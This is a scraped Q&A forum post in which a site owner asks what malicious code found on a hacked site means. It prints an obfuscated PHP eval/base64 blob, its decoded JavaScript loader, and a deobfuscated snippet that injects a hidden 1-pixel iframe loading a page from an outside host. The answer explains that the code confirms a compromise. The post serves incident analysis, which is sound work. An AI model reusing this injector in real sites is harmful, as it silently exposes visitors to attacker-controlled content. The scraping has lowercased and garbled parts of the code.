php - My site got hacked but I don't know what this means -

this question has answer here:

• how decode eval( gzinflate( base64_decode( 3 answers

my site got hacked. wondering code means?

<? #0242d5 #eval(gzinflate(base64_decode("5vvnc5swel33v1gcojbomv8wtitumzn13gppqqab6tigimi39vi/d3cfcxgtzsbnlr4gs6t9b9+utejmq3pitn7s71plbdv0k+6hkulqdpjxn/shtkkbu2oyfpvyxps4ollfvn2anukjwiw/blpyqcr0pd/6/lvrq01pf219d7ss7w2dy09olft5ewrnryxzfs4zl4z7lawyxzbe4nrzgkx6cxyes5yzqabhctnjlgs9hamghden/zwsabh4rj0ztgga3dnhplk4fg/oahhnzpnte2khpiatv9uvghe0+vrquaiteodqcfytkoslkbsfmak2waedf+ip0tj63f4pjpgtd6e4zyahinwdob98uqqgf32cpxgidlbuk0ox4aeon2endaeuiqd2dpbos+b9hj1g8i9latlhjqllunirqyvymlqspnrtdbmj1+pttxh/xbfb7/ac41+sdkz7dnp/2s0h7vrwdjmehsojqf59wzzqpt55tn1hap4pd7ubr2cxhecdveaqbd4bftibpj/prgr01jforztiq8ayauilzp1vvsrdpg4z9d0hkj+otd5dap5qt2onczlbh1jg2is17fy2a5fjc7aylvep8te1lfs166ozu4pbjo7ah0nez/d3ctpzyzp/ej84tnvmrjetzdjxpcpl67dfj36cl9wqlunoxfvh6ol12bbbnuyceu/cwwxibxc3pgkm0cq6yeruxto+krj3uwmj93urqfuzaq7qqwbj42a6tq6wtqs2eb2zb35ltrolzmbed8e36vuvyy2l6m8dpalg4xg90x/km3dg/bs="))); #/0242d5# ?> 

thanks in advance.

here decoded contents:

<script type="text/javascript" language="javascript"> p = parseint; ss = (123) ? string.fromcharcode : 0; asgq = "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!6f!70!62!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!6f!70!62!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!6c!6f!73!6@!6c!6c!61!2e!63!6f!6d!2f!64!74!64!2e!70!68!70!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6f!70!62!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6f!70!62!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!6f!70!62!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6f!70!62!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!6f!70!62!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g, "9").split("!"); try {     document.body &= 0.1 } catch (gdsgsdg) {     zz = 3;     dbshre = 70;     if (dbshre) {         vfvwe = 0;         try {             document;         } catch (agdsg) {             vfvwe = 1;         }         if (!vfvwe) {             e = eval;         }         s = "";         if (zz) (i = 0; - 464 != 0; i++) {                 if (window.document) s += ss(p(asgq[i], 16));         }         if (window.document) e(s);     } } </script> 

and decoded contents of (poorly hand-obfuscated) script:

(function () {     var opb = document.createelement('iframe');      opb.src = 'http://losilla.com/dtd.php';     opb.style.position = 'absolute';     opb.style.border = '0';     opb.style.height = '1px';     opb.style.width = '1px';     opb.style.left = '1px';     opb.style.top = '1px';      if (!document.getelementbyid('opb')) {         document.write('<div id=\'opb\'></div>');         document.getelementbyid('opb').appendchild(opb);     } })(); 

it looks pings http://losilla.com/dtd.php confirm site compromised. there's backdoor script sitting somewhere in public folder well.